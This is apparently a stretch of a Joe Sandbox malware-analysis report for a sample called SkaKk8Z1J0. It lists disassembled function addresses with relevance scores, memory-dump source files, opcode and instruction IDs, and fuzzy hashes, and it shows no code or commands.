                                                                                                                                                                                                                                                  • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                  • Instruction ID: 057f4d3689cca9953cb1c4ad616d9263a8a90072bb5949fb41bba8a397bd4f6e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D114875A587848FC718EFA4ECC067AB3A1BB8A310F29843C85EA47651EBA08D108649
                                                                                                                                                                                                                                                  Function 0043B195 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                  • Instruction ID: 20ca1e341728769f683a14c7d19e02f3155232ce684509dc4d83bd4e8ff0b8df
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72112575A587048FC318EFA4ACC837BB3A4EB8A311F29953D86A647350DB608D118689
                                                                                                                                                                                                                                                  Function 00754806 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f5c82fc671e06e79b78df2e2b48bef573e4aa83533a2b75342557a0be53bb444
                                                                                                                                                                                                                                                  • Instruction ID: 50f4133dff78c5d1b2329d34e0d726c82dff9eb0bcd0c436e74f90b27cf011ee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5c82fc671e06e79b78df2e2b48bef573e4aa83533a2b75342557a0be53bb444
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE0189317006406BF3184B28CC41B7AB353F7D3715F65912CE1809B1D1EEB4AC818B06
                                                                                                                                                                                                                                                  Function 00773897 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction ID: c3558b2d47161e46fbf0372a7403e8bdaa7a58b950ae7c18d772ac0bd215e73c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8511E933B051D40EC7168D3C8400579BFA30AA3275F19C399F4FC9B2D2D6278E8AA761
                                                                                                                                                                                                                                                  Function 00433630 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction ID: b28cf3c768fcd90dd8a03dd2320e21e507999ec1ebf4a65f37eb71fdd5601da6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E011EC336051D41EC3268D3C8400565BF930AA7636F5953DAF4B49B3D2D52A8E8A8759
                                                                                                                                                                                                                                                  Function 00769C17 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
                                                                                                                                                                                                                                                  • Instruction ID: d484fe71f1de0513ac0e886e0f08f02e178876475b246ac0402b39c3f2a1968e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D017CF160030597E720AE64C5C5B3BB2EC6F91710F18482CEE1A5B201DB7AEC06D6B6
                                                                                                                                                                                                                                                  Function 007655B3 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
                                                                                                                                                                                                                                                  • Instruction ID: 9f00427ed65f34205ef767ec813e00cc39a9e7e6530d79903830ab05a356d874
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C911E2367547408BD718CF68D8E15BAB3E19B9A301F59A43C9882C3791CABCC9059B46
                                                                                                                                                                                                                                                  Function 004299B0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                                                                                                                                                  • Instruction ID: 55029b9e38fdfb0df3b4b8151af6569af59bc0d0f5a25f3444c4cc7de86b0466
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E001B1F1B0035257DB209F55B4C1B27B2A86F95718F08443EE80867342DB7DFC44C2AA
                                                                                                                                                                                                                                                  Function 00776C3B Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
                                                                                                                                                                                                                                                  • Instruction ID: d44cdbe0920e011e90fa4130bc0e3e288ed9a0d8ecc67f0f2d84bc1696daf646
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 171148756042009BEB119F24CC80A3BB7E6EBE6740F14D438E68857255DA349C519726
                                                                                                                                                                                                                                                  Function 0074C030 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                  • Instruction ID: f3a638d8c92c6aba28b4f15a21ec94b108a61802a53767f4529166c6e8732835
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4411A071608341ABD7249F29DD9067FBBE2EBC2354F15AE2CE596577A0C630C841CB0A
                                                                                                                                                                                                                                                  Function 0074EAA2 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                  • Instruction ID: 6ae315b574c32cb9bd5330f0ed8301c3e6c7bc20507d04860752b98a667df588
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E311E3747807808FD3188F24CCD6E66B7A2ABD6328719857CB8429BB93C77CAC05C764
                                                                                                                                                                                                                                                  Function 00540083 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724928073.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_540000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                  • Instruction ID: 7645e282207d1863da98cce64cd5130108fde4f6988fdaa990df841803832cdd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8911AC72340100AFDB50DE55DCC5FE677EAFB88324B298065EE08CB356D676E802C760
                                                                                                                                                                                                                                                  Function 0040E83B Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                  • Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8
                                                                                                                                                                                                                                                  Function 00740D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                  • Instruction ID: 83cb4229d83530d0370d8454753e9f6060eefeea1989221efaaa3cc0283f3631
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88018F76B006149FDB21DF64C804BAA33B5FB86316F4544A5DA0A97282E778A9458FD0
                                                                                                                                                                                                                                                  Function 007670E4 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                  • Instruction ID: fd2c36f2397d37c28e89a8d2002b6926ab7ef0d0ac13b4a3b3ca474172654616
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23F06DB5E0C3848BC71CCF28C48062AFBE4AB9A700F10693EE48AA3341DB31D545CB4A
                                                                                                                                                                                                                                                  Function 00767797 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                  • Instruction ID: 85ff879cf1c55161737c407d62489cfbfa1677a0a3d1b62973393a006da1a955
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67F046B410D3919FC304DF29D29051BFBE0ABD5318F64AA5CE8DA5B212D334C9028B4A
                                                                                                                                                                                                                                                  Function 007654D1 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                  • Instruction ID: c4b61ef97504a080c6d964875123dc9adcb862d7ceb35b4117535cd36eb6f4bf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F0EDB1788301BAF6348A00CC43F6BB7B49B55B44F305518B345790E0E5E1BA59870E
                                                                                                                                                                                                                                                  Function 0042526A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                  • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                                                                                                                                                                                                                  Function 0077AD19 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                  • Instruction ID: af26a125379f4a64a98cab85c2efc6055e3d1fac2dfa97e5b0be1b6b74b6214f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7F0A735B456808BEB14CF38E82195EBBE2E387324F145A7DD641D3755D639C8018605
                                                                                                                                                                                                                                                  Function 0043AAB2 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                  • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                                                                                                                                                                                                                  Function 007663B6 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                  • Instruction ID: 1a62f95369db133dbd43d7abbddbbf27c2f33f590db74befd846ab854eb72473
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AD0972480C63AC30E290E1601100BCB7220A03701B8A61E4DDC33F382CB7ECC071258
                                                                                                                                                                                                                                                  Function 0077C268 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                  • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                                  Function 0042891F Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 22b6baa0136d7a81fdec22cf7cdda1a2de21252ce0cf2c52ffb701361c825a6f
